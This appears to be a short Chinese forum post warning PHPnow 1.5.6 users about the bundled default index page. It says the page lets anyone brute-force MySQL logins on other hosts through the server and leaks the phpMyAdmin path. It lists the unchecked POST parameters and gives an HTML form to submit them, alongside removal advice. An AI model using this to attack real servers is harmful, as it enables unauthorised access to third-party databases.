|
本帖最后由 糯米果子 于 2019-1-30 23:11 编辑
打开文件 \PHPnow-1.5.6\Pn\index.ph_ (非网站根路径) 将其修改为其他页面,添加虚拟主机后默认页面即为该页面。
该文件请勿长期存放于外网可访问的网站中(本地测试、局域网除外),目前该版本已8年没有更新,安装测试完成后请及时删除或覆盖,如下页面:
漏洞类型:
漏洞1:MySQL密码爆破漏洞,攻击者可通过该页面发起间接MySQL密码爆破攻击,造成本服务器并发连接数达到上限而瘫痪。
比如域名 a.com 开放了该页面 b.com 开放了端口3306(也可以是其他端口) 攻击者可通过 a.com 的漏洞页面作为代理爆破 b.com 的MySQL帐号密码。
漏洞2:PhpMyAdmin 路径泄漏漏洞,重命名根目录的 phpMyAdmin 文件夹名称即可解决。
利用方法:
该页面中没有任何Cookies/Session校验,来路检查以及验证码功能
提交以下POST参数即表单即可尝试登录一次MySQL:
- mysqlHost 数据库地址
- mysqlDb 数据库名
- mysqlUser 数据库用户名
- mysqlPassword 数据库密码
- act 固定为1
复制代码
使用以下HTML代码提交数据库连接表单:
- <form action="index.php" method="post">
- <input type="hidden" name="act" value="1"/>
- 数据库地址:<input type="text" name="mysqlHost" value="localhost"/><br/>
- 数据库名:<input type="text" name="mysqlDb" value="test"/><br/>
- 数据库用户名:<input type="text" name="mysqlUser" value="root"/><br/>
- 数据库密码:<input type="text" name="mysqlPassword" /><br/>
- <input type="submit" value="连接" /><br/>
- </form>
复制代码
|
|